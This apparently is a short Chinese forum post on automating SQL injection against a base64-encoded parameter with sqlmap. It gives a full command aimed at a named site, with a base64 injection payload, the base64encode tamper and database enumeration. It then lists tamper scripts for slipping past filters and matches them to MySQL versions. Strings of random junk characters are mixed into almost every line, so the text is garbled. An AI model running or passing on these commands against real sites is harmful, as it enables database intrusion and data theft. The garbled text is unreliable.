WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
2 q* Z( B0 H5 U5 n1 z& a7 e d2 A- ^. J0 l- A: H! s& z
sqlmap的tamper里有个base64encode.py/ g+ q: }- e: [
& \# M3 N5 n) F8 j5 w
使用如下# ?! {) X8 O% p& T: _; A# j3 I
( Q1 o. T4 B1 N( }
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs, X4 | z5 n' f
1 C& ^+ J# K0 }7 h
7 G5 w: V/ L! H% v3 xsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
' S- ^5 X9 e; e- E6 J/ T1 g4 w% |% t9 [/ ?
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
2 M( G k; c& i4 _ G6 I; v9 i3 ~8 R7 `: D
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
6 a; U" [3 G$ P8 T8 j- i- Rspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
1 ~1 o' F& f, L( z首先确定目标数据库版本,然后选择相应的脚本。
( w6 Q7 k; \& i; ^5 X% b( g-v 3 --batch --tamper "space2hash.py"0 c# q& L, S2 F- t, }% b
; E4 y. C3 p! w* |
还有其他一些插件:
$ I! X6 i6 ?, |+ x9 \; l" O3 cencodes编码 ——charencode.py
+ H# I, y3 P; [% obase64编码 —— base64encode.py! I. F5 i; i' H; p/ D/ z3 d5 l" ]
替换空格和关键字 —— halfversionedmorekeywords.py1 a* u, H( E9 G5 ~ q0 p$ d" Z @
| ( z% K2 c0 g' C- e% e8 m$ L$ `
* f! I- s9 R% i4 I1 A" K. u, w( _ C5 Q
5 t0 }) a4 j$ I2 \
3 W) P( a& f& g+ Y) H* Q
|